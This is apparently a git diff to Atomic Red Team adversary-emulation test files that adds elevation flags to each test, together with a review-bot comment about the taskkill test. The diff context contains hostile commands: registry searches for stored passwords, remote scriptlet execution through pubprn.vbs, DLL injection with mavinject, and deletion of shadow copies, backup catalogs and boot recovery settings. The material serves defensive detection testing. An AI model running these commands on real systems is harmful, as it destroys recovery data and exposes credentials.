HKLM:SOFTWARE\Classes\Excel.Application)){ return 'Please install Microsoft Excel before running this test.' 
diff --git a/atomics/T1196/T1196.yaml b/atomics/T1196/T1196.yaml index 2240ac28e5..01b9554efe 100644 --- a/atomics/T1196/T1196.yaml +++ b/atomics/T1196/T1196.yaml @@ -18,5 +18,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | control.exe #{cpl_file_path} diff --git a/atomics/T1201/T1201.yaml b/atomics/T1201/T1201.yaml index 72237a3a7d..141e209d32 100644 --- a/atomics/T1201/T1201.yaml +++ b/atomics/T1201/T1201.yaml @@ -62,6 +62,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net accounts @@ -74,6 +75,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | net accounts /domain diff --git a/atomics/T1214/T1214.yaml b/atomics/T1214/T1214.yaml index 70d61d1468..6da7c37557 100644 --- a/atomics/T1214/T1214.yaml +++ b/atomics/T1214/T1214.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index 8e0d77f404..4de8acfafe 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -18,5 +18,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 931299315c..f97abbb086 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -21,6 +21,7 @@ atomic_tests: default: 1000 executor: name: command_prompt + elevation_required: true command: | mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} diff --git a/atomics/T1223/T1223.yaml b/atomics/T1223/T1223.yaml index 0c2b924769..cc2240bdff 100644 --- a/atomics/T1223/T1223.yaml +++ b/atomics/T1223/T1223.yaml 
@@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | hh.exe #{local_chm_file} @@ -36,5 +37,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | hh.exe #{remote_chm_file} diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index 5a6f1ed409..a0c216cccd 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | vssadmin.exe delete shadows /all /quiet @@ -24,6 +25,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | wbadmin.exe delete catalog -quiet @@ -37,6 +39,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no diff --git a/atomics/T1489/T1489.yaml b/atomics/T1489/T1489.yaml index fcf2b767df..8ff99a8038 100644 --- a/atomics/T1489/T1489.yaml +++ b/atomics/T1489/T1489.yaml @@ -18,6 +18,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | sc.exe stop #{service_name} @@ -36,6 +37,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | net.exe stop #{service_name} @@ -55,5 +57,6 @@ atomic_tests: executor: name: command_prompt + elevation_required: false command: | taskkill.exe /f /im #{process_name} diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml index 171728e1da..3a12008f94 100644 --- a/atomics/T1490/T1490.yaml +++ b/atomics/T1490/T1490.yaml @@ -12,6 +12,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | vssadmin.exe delete shadows /all /quiet @@ -24,6 +25,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | wmic.exe shadowcopy delete 
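Review bot: `elevation_required: false` on the last T1489 hunk (`taskkill.exe /f /im #{process_name}`) holds only when the target process is owned by the running user; forcibly terminating a service process or another user's process needs an elevated prompt, and the default for `process_name` is outside the hunk so I cannot tell which case the test intends. Either set the attribute to `true` if the default targets a service-level process, or note in the test's `description` that it is limited to user-owned processes. The `sc.exe stop` and `net.exe stop` hunks above are marked `true`, which is the consistent choice if this test is meant to stop a service.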
@@ -37,6 +39,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | wbadmin.exe delete catalog -quiet @@ -50,6 +53,7 @@ atomic_tests: executor: name: command_prompt + elevation_required: true command: | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no